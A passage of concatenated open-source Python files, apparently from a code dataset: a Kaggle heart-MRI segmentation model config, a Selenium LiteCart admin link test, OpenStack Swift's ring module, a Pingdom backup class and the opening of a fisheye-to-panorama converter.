"sliced:data:sax:is_not_padded": (batch_size, nr_slices),
"sliced:data:randomslices": (batch_size, nr_slices, 30, patch_px, patch_px),
"sliced:data:singleslice:difference:middle": (batch_size, 29, patch_px, patch_px),
"sliced:data:singleslice:difference": (batch_size, 29, patch_px, patch_px),
"sliced:data:singleslice": (batch_size, 30, patch_px, patch_px),
"sliced:data:ax": (batch_size, 30, 15, patch_px, patch_px),
"sliced:data:shape": (batch_size, 2,),
"sunny": (sunny_batch_size, 1, patch_px, patch_px)
# TBC with the metadata
}
# Objective
l2_weight = 0.000
l2_weight_out = 0.000
def build_objective(interface_layers):
# l2 regu on certain layers
l2_penalty = nn.regularization.regularize_layer_params_weighted(
interface_layers["regularizable"], nn.regularization.l2)
# build objective
return objectives.KaggleObjective(interface_layers["outputs"], penalty=l2_penalty)
# Testing
postprocess = postprocess.postprocess
test_time_augmentations = 100 # More augmentations since we only use single slices
tta_average_method = lambda x: np.cumsum(utils.norm_geometric_average(utils.cdf_to_pdf(x)))
# nonlinearity putting a lower bound on its output
def lb_softplus(lb):
return lambda x: nn.nonlinearities.softplus(x) + lb
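# Illustrative use: lb_softplus(0.1) returns a nonlinearity whose output is
# always strictly greater than 0.1 (softplus itself is positive), which keeps
# quantities such as predicted sigmas away from zero.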
init = nn.init.Orthogonal()
rnn_layer = functools.partial(nn.layers.RecurrentLayer,
W_in_to_hid=init,
W_hid_to_hid=init,
b=nn.init.Constant(0.1),
nonlinearity=nn.nonlinearities.rectify,
hid_init=nn.init.Constant(0.),
backwards=False,
learn_init=True,
gradient_steps=-1,
grad_clipping=False,
unroll_scan=False,
precompute_input=False)
# Architecture
def build_model():
#################
# Regular model #
#################
input_size = data_sizes["sliced:data:sax"]
input_size_mask = data_sizes["sliced:data:sax:is_not_padded"]
input_size_locations = data_sizes["sliced:data:sax:locations"]
l0 = nn.layers.InputLayer(input_size)
lin_slice_mask = nn.layers.InputLayer(input_size_mask)
lin_slice_locations = nn.layers.InputLayer(input_size_locations)
    # PREPROCESS SLICES SEPARATELY
l0_slices = nn.layers.ReshapeLayer(l0, (batch_size * nr_slices, 30, patch_px, patch_px)) # (bxs, t, i, j)
subsample_factor = 2
l0_slices_subsampled = nn.layers.SliceLayer(l0_slices, axis=1, indices=slice(0, 30, subsample_factor))
nr_frames_subsampled = 30 / subsample_factor
    # PREPROCESS FRAMES SEPARATELY
l0_frames = nn.layers.ReshapeLayer(l0_slices_subsampled, (batch_size * nr_slices * nr_frames_subsampled, 1, patch_px, patch_px)) # (bxsxt, 1, i, j)
# downsample
downsample = lambda incoming: nn.layers.dnn.Pool2DDNNLayer(incoming, pool_size=(2,2), stride=(2,2), mode='average_inc_pad')
upsample = lambda incoming: nn.layers.Upscale2DLayer(incoming, scale_factor=2)
l0_frames_d0 = l0_frames
l0_frames_d1 = downsample(l0_frames_d0)
l0_frames_d2 = downsample(l0_frames_d1)
l0_frames_d3 = downsample(l0_frames_d2)
ld3a = nn.layers.dnn.Conv2DDNNLayer(l0_frames_d3, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=16, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld3b = nn.layers.dnn.Conv2DDNNLayer(ld3a, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=16, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld3c = nn.layers.dnn.Conv2DDNNLayer(ld3b, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=16, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld3o = nn.layers.dnn.Conv2DDNNLayer(ld3c, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=16, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld2i = nn.layers.ConcatLayer([l0_frames_d2, upsample(ld3o)], axis=1)
ld2a = nn.layers.dnn.Conv2DDNNLayer(ld2i, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld2b = nn.layers.dnn.Conv2DDNNLayer(ld2a, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld2c = nn.layers.dnn.Conv2DDNNLayer(ld2b, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld2d = nn.layers.dnn.Conv2DDNNLayer(ld2c, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld2o = nn.layers.dnn.Conv2DDNNLayer(ld2d, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld1i = nn.layers.ConcatLayer([l0_frames_d1, upsample(ld2o)], axis=1)
ld1a = nn.layers.dnn.Conv2DDNNLayer(ld1i, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld1b = nn.layers.dnn.Conv2DDNNLayer(ld1a, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld1c = nn.layers.dnn.Conv2DDNNLayer(ld1b, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld1d = nn.layers.dnn.Conv2DDNNLayer(ld1c, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld1o = nn.layers.dnn.Conv2DDNNLayer(ld1d, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld0i = nn.layers.ConcatLayer([l0_frames_d0, upsample(ld1o)], axis=1)
ld0a = nn.layers.dnn.Conv2DDNNLayer(ld0i, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld0b = nn.layers.dnn.Conv2DDNNLayer(ld0a, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld0c = nn.layers.dnn.Conv2DDNNLayer(ld0b, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld0d = nn.layers.dnn.Conv2DDNNLayer(ld0c, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=32, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
ld0o = nn.layers.dnn.Conv2DDNNLayer(ld0d, W=nn.init.Orthogonal("relu"), filter_size=(5,5), num_filters=1, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.sigmoid)
ld0r = nn.layers.ReshapeLayer(ld0o, (batch_size * nr_slices * nr_frames_subsampled, patch_px, patch_px))
l_frames_musigma = layers.IntegrateAreaLayer(ld0r, sigma_mode='scale', sigma_scale=.1)
area_per_pixel_cm = (float(patch_mm) / float(patch_px))**2 / 100.0
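    # Illustrative arithmetic: with patch_mm=64 and patch_px=32 each pixel is
    # 2 mm x 2 mm = 4 mm^2, and dividing by 100 converts that to 0.04 cm^2.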
l_frames_musigma_cm = layers.TrainableScaleLayer(l_frames_musigma, scale=nn.init.Constant(area_per_pixel_cm), trainable=False)
# Go back to a per slice model
l_slices_musigma_cm = nn.layers.ReshapeLayer(l_frames_musigma_cm, (batch_size * nr_slices, nr_frames_subsampled, 2)) # (bxs, t, 2)
l_slices_musigma_cm_sys = layers.ArgmaxAndMaxLayer(l_slices_musigma_cm, mode='min') # (bxs, 2)
l_slices_musigma_cm_dia = layers.ArgmaxAndMaxLayer(l_slices_musigma_cm, mode='max') # (bxs, 2)
l_slices_musigma_cm_avg = layers.ArgmaxAndMaxLayer(l_slices_musigma_cm, mode='mean')
# AGGREGATE SLICES PER PATIENT
l_scaled_slice_locations = layers.TrainableScaleLayer(lin_slice_locations, scale=nn.init.Constant(0.1), trainable=False)
# Systole
l_pat_sys_ss_musigma_cm = nn.layers.ReshapeLayer(l_slices_musigma_cm_sys, (batch_size, nr_slices, 2))
l_pat_sys_ss_mu_cm = nn.layers.SliceLayer(l_pat_sys_ss_musigma_cm, indices=0, axis=-1)
l_pat_sys_ss_sigma_cm = nn.layers.SliceLayer(l_pat_sys_ss_musigma_cm, indices=1, axis=-1)
l_pat_sys_aggr_mu_sigma = layers.JeroenLayer([l_pat_sys_ss_mu_cm, l_pat_sys_ss_sigma_cm, lin_slice_mask, l_scaled_slice_locations], rescale_input=1.)
l_systole = layers.MuSigmaErfLayer(l_pat_sys_aggr_mu_sigma)
# Diastole
l_pat_dia_ss_musigma_cm = nn.layers.ReshapeLayer(l_slices_musigma_cm_dia, (batch_size, nr_slices, 2))
l_pat_dia_ss_mu_cm = nn.layers.SliceLayer(l_pat_dia_ss_musigma_cm, indices=0, axis=-1)
l_pat_dia_ss_sigma_cm = nn.layers.SliceLayer(l_pat_dia_ss_musigma_cm, indices=1, axis=-1)
l_pat_dia_aggr_mu_sigma = layers.JeroenLayer([l_pat_dia_ss_mu_cm, l_pat_dia_ss_sigma_cm, lin_slice_mask, l_scaled_slice_locations], rescale_input=1.)
l_diastole = layers.MuSigmaErfLayer(l_pat_dia_aggr_mu_sigma)
# Average
l_pat_avg_ss_musigma_cm = nn.layers.ReshapeLayer(l_slices_musigma_cm_avg, (batch_size, nr_slices, 2))
l_pat_avg_ss_mu_cm = nn.layers.SliceLayer(l_pat_avg_ss_musigma_cm, indices=0, axis=-1)
l_pat_avg_ss_sigma_cm = nn.layers.SliceLayer(l_pat_avg_ss_musigma_cm, indices=1, axis=-1)
l_pat_avg_aggr_mu_sigma = layers.JeroenLayer([l_pat_avg_ss_mu_cm, l_pat_avg_ss_sigma_cm, lin_slice_mask, l_scaled_slice_locations], rescale_input=1.)
l_mean = layers.MuSigmaErfLayer(l_pat_avg_aggr_mu_sigma)
return {
"inputs":{
"sliced:data:sax": l0,
"sliced:data:sax:is_not_padded": lin_slice_mask,
"sliced:data:sax:locations": lin_slice_locations,
},
"outputs": {
"systole": l_systole,
"diastole": l_diastole,
"average": l_mean,
},
"regularizable": {
},
}
| 317070/kaggle-heart | configurations/je_os_segmentandintegrate_noreg.py | Python | mit | 12,455 |
import random
import pytest
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.wait import WebDriverWait
@pytest.fixture
def driver(request):
driver = webdriver.Chrome()
driver.implicitly_wait(2)
request.addfinalizer(driver.quit)
return driver
def test_external_links(driver):
wait = WebDriverWait(driver, 5)
driver.get("http://localhost/litecart/admin")
driver.find_element_by_name("username").send_keys("admin")
driver.find_element_by_name("password").send_keys("admin")
driver.find_element_by_name("login").click()
wait.until(EC.title_is("My Store"))
menu = driver.find_element_by_id("box-apps-menu")
menu.find_element(By.LINK_TEXT, "Countries").click()
wait.until(EC.title_contains("Countries"))
table = driver.find_element(By.CSS_SELECTOR, "table.dataTable")
rows = table.find_elements(By.CSS_SELECTOR, ".row")
countries = [row.find_element(By.TAG_NAME, 'a').text for row in rows]
    country = random.randrange(0, len(countries))
driver.find_element(By.LINK_TEXT, countries[country]).click()
external_links = driver.find_elements(By.CLASS_NAME, "fa-external-link")
    old_window = driver.current_window_handle
    new_window = None
    for external_link in external_links:
        existing_windows = driver.window_handles
        external_link.click()
        wait.until(EC.new_window_is_opened(existing_windows))
        current_windows = driver.window_handles
for window_id in current_windows:
if window_id != old_window:
new_window = window_id
driver.switch_to_window(new_window)
driver.close()
driver.switch_to_window(old_window) | dmchu/selenium_gr_5 | tests/day_8/hw_day_8_task_14.py | Python | apache-2.0 | 1,741 |
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import array
import six.moves.cPickle as pickle
import inspect
from collections import defaultdict
from gzip import GzipFile
from os.path import getmtime
import struct
from time import time
import os
from io import BufferedReader
from hashlib import md5
from itertools import chain
from tempfile import NamedTemporaryFile
from six.moves import range
from swift.common.utils import hash_path, validate_configuration, json
from swift.common.ring.utils import tiers_for_dev
class RingData(object):
"""Partitioned consistent hashing ring data (used for serialization)."""
def __init__(self, replica2part2dev_id, devs, part_shift):
self.devs = devs
self._replica2part2dev_id = replica2part2dev_id
self._part_shift = part_shift
for dev in self.devs:
if dev is not None:
dev.setdefault("region", 1)
@classmethod
def deserialize_v1(cls, gz_file, metadata_only=False):
"""
Deserialize a v1 ring file into a dictionary with `devs`, `part_shift`,
and `replica2part2dev_id` keys.
If the optional kwarg `metadata_only` is True, then the
`replica2part2dev_id` is not loaded and that key in the returned
dictionary just has the value `[]`.
:param file gz_file: An opened file-like object which has already
consumed the 6 bytes of magic and version.
:param bool metadata_only: If True, only load `devs` and `part_shift`
:returns: A dict containing `devs`, `part_shift`, and
`replica2part2dev_id`
"""
json_len, = struct.unpack('!I', gz_file.read(4))
ring_dict = json.loads(gz_file.read(json_len))
ring_dict['replica2part2dev_id'] = []
if metadata_only:
return ring_dict
partition_count = 1 << (32 - ring_dict['part_shift'])
for x in range(ring_dict['replica_count']):
ring_dict['replica2part2dev_id'].append(
array.array('H', gz_file.read(2 * partition_count)))
return ring_dict
@classmethod
def load(cls, filename, metadata_only=False):
"""
Load ring data from a file.
:param filename: Path to a file serialized by the save() method.
:param bool metadata_only: If True, only load `devs` and `part_shift`.
:returns: A RingData instance containing the loaded data.
"""
gz_file = GzipFile(filename, 'rb')
# Python 2.6 GzipFile doesn't support BufferedIO
if hasattr(gz_file, '_checkReadable'):
gz_file = BufferedReader(gz_file)
# See if the file is in the new format
magic = gz_file.read(4)
if magic == 'R1NG':
format_version, = struct.unpack('!H', gz_file.read(2))
if format_version == 1:
ring_data = cls.deserialize_v1(
gz_file, metadata_only=metadata_only)
else:
raise Exception('Unknown ring format version %d' %
format_version)
else:
# Assume old-style pickled ring
gz_file.seek(0)
ring_data = pickle.load(gz_file)
if not hasattr(ring_data, 'devs'):
ring_data = RingData(ring_data['replica2part2dev_id'],
ring_data['devs'], ring_data['part_shift'])
return ring_data
def serialize_v1(self, file_obj):
# Write out new-style serialization magic and version:
file_obj.write(struct.pack('!4sH', 'R1NG', 1))
ring = self.to_dict()
json_encoder = json.JSONEncoder(sort_keys=True)
json_text = json_encoder.encode(
{'devs': ring['devs'], 'part_shift': ring['part_shift'],
'replica_count': len(ring['replica2part2dev_id'])})
json_len = len(json_text)
file_obj.write(struct.pack('!I', json_len))
file_obj.write(json_text)
for part2dev_id in ring['replica2part2dev_id']:
file_obj.write(part2dev_id.tostring())
def save(self, filename, mtime=1300507380.0):
"""
Serialize this RingData instance to disk.
:param filename: File into which this instance should be serialized.
:param mtime: time used to override mtime for gzip, default or None
if the caller wants to include time
"""
# Override the timestamp so that the same ring data creates
# the same bytes on disk. This makes a checksum comparison a
# good way to see if two rings are identical.
#
# This only works on Python 2.7; on 2.6, we always get the
# current time in the gzip output.
tempf = NamedTemporaryFile(dir=".", prefix=filename, delete=False)
if 'mtime' in inspect.getargspec(GzipFile.__init__).args:
gz_file = GzipFile(filename, mode='wb', fileobj=tempf,
mtime=mtime)
else:
gz_file = GzipFile(filename, mode='wb', fileobj=tempf)
self.serialize_v1(gz_file)
gz_file.close()
tempf.flush()
os.fsync(tempf.fileno())
tempf.close()
os.chmod(tempf.name, 0o644)
os.rename(tempf.name, filename)
def to_dict(self):
return {'devs': self.devs,
'replica2part2dev_id': self._replica2part2dev_id,
'part_shift': self._part_shift}
class Ring(object):
"""
Partitioned consistent hashing ring.
:param serialized_path: path to serialized RingData instance
:param reload_time: time interval in seconds to check for a ring change
"""
def __init__(self, serialized_path, reload_time=15, ring_name=None):
# can't use the ring unless HASH_PATH_SUFFIX is set
validate_configuration()
if ring_name:
self.serialized_path = os.path.join(serialized_path,
ring_name + '.ring.gz')
else:
self.serialized_path = os.path.join(serialized_path)
self.reload_time = reload_time
self._reload(force=True)
def _reload(self, force=False):
self._rtime = time() + self.reload_time
if force or self.has_changed():
ring_data = RingData.load(self.serialized_path)
self._mtime = getmtime(self.serialized_path)
self._devs = ring_data.devs
            # NOTE(akscram): Replication parameters like replication_ip
            #                and replication_port are required for the
            #                replication process. An old replication
            #                ring doesn't contain these parameters in
            #                its devices. Old-style pickled rings won't
            #                have region information.
for dev in self._devs:
if dev:
dev.setdefault('region', 1)
if 'ip' in dev:
dev.setdefault('replication_ip', dev['ip'])
if 'port' in dev:
dev.setdefault('replication_port', dev['port'])
self._replica2part2dev_id = ring_data._replica2part2dev_id
self._part_shift = ring_data._part_shift
self._rebuild_tier_data()
# Do this now, when we know the data has changed, rather than
# doing it on every call to get_more_nodes().
regions = set()
zones = set()
ips = set()
self._num_devs = 0
for dev in self._devs:
if dev:
regions.add(dev['region'])
zones.add((dev['region'], dev['zone']))
ips.add((dev['region'], dev['zone'], dev['ip']))
self._num_devs += 1
self._num_regions = len(regions)
self._num_zones = len(zones)
self._num_ips = len(ips)
def _rebuild_tier_data(self):
self.tier2devs = defaultdict(list)
for dev in self._devs:
if not dev:
continue
for tier in tiers_for_dev(dev):
self.tier2devs[tier].append(dev)
tiers_by_length = defaultdict(list)
for tier in self.tier2devs:
tiers_by_length[len(tier)].append(tier)
self.tiers_by_length = sorted(tiers_by_length.values(),
key=lambda x: len(x[0]))
for tiers in self.tiers_by_length:
tiers.sort()
@property
def replica_count(self):
"""Number of replicas (full or partial) used in the ring."""
return len(self._replica2part2dev_id)
@property
def partition_count(self):
"""Number of partitions in the ring."""
return len(self._replica2part2dev_id[0])
@property
def devs(self):
"""devices in the ring"""
if time() > self._rtime:
self._reload()
return self._devs
def has_changed(self):
"""
Check to see if the ring on disk is different than the current one in
memory.
:returns: True if the ring on disk has changed, False otherwise
"""
return getmtime(self.serialized_path) != self._mtime
def _get_part_nodes(self, part):
part_nodes = []
seen_ids = set()
for r2p2d in self._replica2part2dev_id:
if part < len(r2p2d):
dev_id = r2p2d[part]
if dev_id not in seen_ids:
part_nodes.append(self.devs[dev_id])
seen_ids.add(dev_id)
return [dict(node, index=i) for i, node in enumerate(part_nodes)]
def get_part(self, account, container=None, obj=None):
"""
Get the partition for an account/container/object.
:param account: account name
:param container: container name
:param obj: object name
:returns: the partition number
"""
key = hash_path(account, container, obj, raw_digest=True)
if time() > self._rtime:
self._reload()
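        # The top (32 - part_shift) bits of the path hash select the partition;
        # e.g. with part_shift=23 there are 2**9 = 512 partitions (illustrative
        # value, not a default).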
part = struct.unpack_from('>I', key)[0] >> self._part_shift
return part
def get_part_nodes(self, part):
"""
Get the nodes that are responsible for the partition. If one
node is responsible for more than one replica of the same
partition, it will only appear in the output once.
:param part: partition to get nodes for
:returns: list of node dicts
See :func:`get_nodes` for a description of the node dicts.
"""
if time() > self._rtime:
self._reload()
return self._get_part_nodes(part)
def get_nodes(self, account, container=None, obj=None):
"""
Get the partition and nodes for an account/container/object.
If a node is responsible for more than one replica, it will
only appear in the output once.
:param account: account name
:param container: container name
:param obj: object name
:returns: a tuple of (partition, list of node dicts)
Each node dict will have at least the following keys:
====== ===============================================================
id unique integer identifier amongst devices
index offset into the primary node list for the partition
weight a float of the relative weight of this device as compared to
others; this indicates how many partitions the builder will try
to assign to this device
zone integer indicating which zone the device is in; a given
partition will not be assigned to multiple devices within the
same zone
ip the ip address of the device
port the tcp port of the device
device the device's name on disk (sdb1, for example)
meta general use 'extra' field; for example: the online date, the
hardware description
====== ===============================================================
"""
part = self.get_part(account, container, obj)
return part, self._get_part_nodes(part)
def get_more_nodes(self, part):
"""
Generator to get extra nodes for a partition for hinted handoff.
The handoff nodes will try to be in zones other than the
primary zones, will take into account the device weights, and
will usually keep the same sequences of handoffs even with
ring changes.
:param part: partition to get handoff nodes for
:returns: generator of node dicts
See :func:`get_nodes` for a description of the node dicts.
"""
if time() > self._rtime:
self._reload()
primary_nodes = self._get_part_nodes(part)
used = set(d['id'] for d in primary_nodes)
same_regions = set(d['region'] for d in primary_nodes)
same_zones = set((d['region'], d['zone']) for d in primary_nodes)
same_ips = set(
(d['region'], d['zone'], d['ip']) for d in primary_nodes)
parts = len(self._replica2part2dev_id[0])
start = struct.unpack_from(
'>I', md5(str(part)).digest())[0] >> self._part_shift
inc = int(parts / 65536) or 1
# Multiple loops for execution speed; the checks and bookkeeping get
# simpler as you go along
hit_all_regions = len(same_regions) == self._num_regions
for handoff_part in chain(range(start, parts, inc),
range(inc - ((parts - start) % inc),
start, inc)):
if hit_all_regions:
# At this point, there are no regions left untouched, so we
# can stop looking.
break
for part2dev_id in self._replica2part2dev_id:
if handoff_part < len(part2dev_id):
dev_id = part2dev_id[handoff_part]
dev = self._devs[dev_id]
region = dev['region']
if dev_id not in used and region not in same_regions:
yield dev
used.add(dev_id)
same_regions.add(region)
zone = dev['zone']
ip = (region, zone, dev['ip'])
same_zones.add((region, zone))
same_ips.add(ip)
if len(same_regions) == self._num_regions:
hit_all_regions = True
break
hit_all_zones = len(same_zones) == self._num_zones
for handoff_part in chain(range(start, parts, inc),
range(inc - ((parts - start) % inc),
start, inc)):
if hit_all_zones:
# Much like we stopped looking for fresh regions before, we
# can now stop looking for fresh zones; there are no more.
break
for part2dev_id in self._replica2part2dev_id:
if handoff_part < len(part2dev_id):
dev_id = part2dev_id[handoff_part]
dev = self._devs[dev_id]
zone = (dev['region'], dev['zone'])
if dev_id not in used and zone not in same_zones:
yield dev
used.add(dev_id)
same_zones.add(zone)
ip = zone + (dev['ip'],)
same_ips.add(ip)
if len(same_zones) == self._num_zones:
hit_all_zones = True
break
hit_all_ips = len(same_ips) == self._num_ips
for handoff_part in chain(range(start, parts, inc),
range(inc - ((parts - start) % inc),
start, inc)):
if hit_all_ips:
# We've exhausted the pool of unused backends, so stop
# looking.
break
for part2dev_id in self._replica2part2dev_id:
if handoff_part < len(part2dev_id):
dev_id = part2dev_id[handoff_part]
dev = self._devs[dev_id]
ip = (dev['region'], dev['zone'], dev['ip'])
if dev_id not in used and ip not in same_ips:
yield dev
used.add(dev_id)
same_ips.add(ip)
if len(same_ips) == self._num_ips:
hit_all_ips = True
break
hit_all_devs = len(used) == self._num_devs
for handoff_part in chain(range(start, parts, inc),
range(inc - ((parts - start) % inc),
start, inc)):
if hit_all_devs:
# We've used every device we have, so let's stop looking for
# unused devices now.
break
for part2dev_id in self._replica2part2dev_id:
if handoff_part < len(part2dev_id):
dev_id = part2dev_id[handoff_part]
if dev_id not in used:
yield self._devs[dev_id]
used.add(dev_id)
if len(used) == self._num_devs:
hit_all_devs = True
break
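# Illustrative usage sketch (not part of the original module). It assumes a
# swift.conf with a hash path suffix is available; the ring directory, account,
# container and object names below are hypothetical.
def _example_ring_lookup(swift_dir='/etc/swift'):
    object_ring = Ring(swift_dir, ring_name='object')
    part, nodes = object_ring.get_nodes('AUTH_test', 'photos', 'cat.jpg')
    handoffs = list(object_ring.get_more_nodes(part))
    return part, nodes, handoffs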
| mjzmjz/swift | swift/common/ring/ring.py | Python | apache-2.0 | 18,195 |
from calendar import timegm
from datetime import datetime, timedelta
from .Pingdom import Pingdom
from .Database import Database
from .log import log
class PingdomBackup:
MAX_INTERVAL = 2764800
def __init__(self, email, password, app_key, database):
self.pingdom = Pingdom(email, password, app_key)
self.database = Database(database)
def update_probes(self):
# get the probe list
log.info('Updating probe records.')
resp_json = self.pingdom.api('GET', 'probes', params={'includedeleted': True})
probes = resp_json['probes']
for probe in probes:
self.database.upsert_record('probes', probe)
log.info('{0} {1} updated.'.format(len(probes), 'probe was' if len(probes) == 1 else 'probes were'))
def update_checks(self):
# get the checks list
log.info('Updating check records.')
resp_json = self.pingdom.api('GET', 'checks')
checks = resp_json['checks']
for check in checks:
del check['tags']
self.database.upsert_record('checks', check)
log.info('{0} {1} updated.'.format(len(checks), 'check was' if len(checks) == 1 else 'checks were'))
def get_check_by_name(self, name):
return self.database.get_record('checks', where='name = ?', parameters=(name, ))
def update_results(self, check):
log.info('Checking for new results.')
# get the most recent result time from the database
results = self.database.get_records('results', order_by='time DESC', limit=1)
if len(results) == 0:
min_from_t = 0
else:
# + 1 because we don't want to include the previous result
min_from_t = results[0]['time'] + 1
to_t = timegm((datetime.now() + timedelta(days=2)).timetuple())
limit = 1000
last_count = limit
all_results = []
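        # Page backwards through the results API: each request returns at most
        # `limit` rows in the window ending at `to_t`; `to_t` is pulled back to
        # the oldest time seen so far, and the loop stops once a page comes
        # back shorter than `limit`.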
while last_count == limit:
# calculate the minimum bound
from_t = max(to_t - self.MAX_INTERVAL, min_from_t)
# get the next page
resp_json = self.pingdom.api('GET', 'results/{0}'.format(check['id']), params={
'to': to_t,
'from': from_t,
'limit': limit
})
results = resp_json['results']
last_count = len(results)
# inspect each row
for result in results:
result['id'] = None
result['checkid'] = check['id']
# update the to_timestamp
if result['time'] < to_t:
to_t = result['time']
all_results.extend(results)
# bulk insert
all_results = sorted(all_results, key=lambda r: r['time'])
log.info('{0} new {1} been found.'.format(len(all_results), 'result has' if len(all_results) == 1 else 'results have'))
self.database.insert_records('results', all_results)
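# Illustrative usage sketch (not part of the original module); the credentials,
# check name and database path below are hypothetical.
def _example_backup_run():
    pb = PingdomBackup('user@example.com', 'secret', 'app-key', 'pingdom.db')
    pb.update_probes()
    pb.update_checks()
    check = pb.get_check_by_name('My Website')
    pb.update_results(check)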
| joelverhagen/PingdomBackup | pingdombackup/PingdomBackup.py | Python | mit | 2,948 |
# -*- coding: utf-8 -*-
# Dual-fisheye to 360-photo conversion tool
# Supports equirectangular and cubemap output formats
#
# Usage instructions:
# python fisheye.py
# Start interactive alignment GUI.
# python fisheye.py -help
# Print this help message.
# python fisheye.py lens.cfg in1.jpg in2.jpg gui
# Launch interactive GUI with specified default options
# python fisheye.py lens.cfg in1.jpg in2.jpg rect=out.png
# Render and save equirectangular panorama using specified
# lens configuration and source images.
# python fisheye.py lens.cfg in1.jpg in2.jpg cube=out.png
# Render and save cubemap panorama using specified
# lens configuration and source images.
#
# Copyright (c) 2016 Alexander C. Utter
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import json
import numpy as np
import Tkinter as tk
import tkFileDialog
import tkMessageBox
import sys
import traceback
from copy import deepcopy
from math import pi
from PIL import Image, ImageTk
from scipy.optimize import minimize
from threading import Thread
# Create rotation matrix from an arbitrary quaternion. See also:
# https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation#Conversion_to_and_from_the_matrix_representation
def get_rotation_matrix(qq):
# Normalize matrix and extract individual items.
qq_norm = np.sqrt(np.sum(np.square(qq)))
w = qq[0] / qq_norm
x = qq[1] / qq_norm
y = qq[2] / qq_norm
z = qq[3] / qq_norm
# Convert to rotation matrix.
return np.matrix([[w*w+x*x-y*y-z*z, 2*x*y-2*w*z, 2*x*z+2*w*y],
[2*x*y+2*w*z, w*w-x*x+y*y-z*z, 2*y*z-2*w*x],
[2*x*z-2*w*y, 2*y*z+2*w*x, w*w-x*x-y*y+z*z]], dtype='float32')
# Conjugate a quaternion to apply the opposite rotation.
def conj_qq(qq):
return np.array([qq[0], -qq[1], -qq[2], -qq[3]])
# Multiply two quaternions: ab = (a0*b0 - av dot bv; a0*bv + b0*av + av cross bv)
# https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation#Conversion_to_and_from_the_matrix_representation
def mul_qq(qa, qb):
return np.array([qa[0]*qb[0] - qa[1]*qb[1] - qa[2]*qb[2] - qa[3]*qb[3],
qa[0]*qb[1] + qa[1]*qb[0] + qa[2]*qb[3] - qa[3]*qb[2],
qa[0]*qb[2] + qa[2]*qb[0] + qa[3]*qb[1] - qa[1]*qb[3],
qa[0]*qb[3] + qa[3]*qb[0] + qa[1]*qb[2] - qa[2]*qb[1]])
# Generate a normalized quaternion [W,X,Y,Z] from [X,Y,Z]
def norm_qq(x, y, z):
rsq = x**2 + y**2 + z**2
if rsq < 1:
w = np.sqrt(1-rsq)
return [w, x, y, z]
else:
r = np.sqrt(rsq)
return [0, x/r, y/r, z/r]
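# Small self-check of the quaternion helpers (added for illustration, not part
# of the original tool): a 90-degree rotation about +Z maps +X onto +Y.
def _example_rotate_x_about_z():
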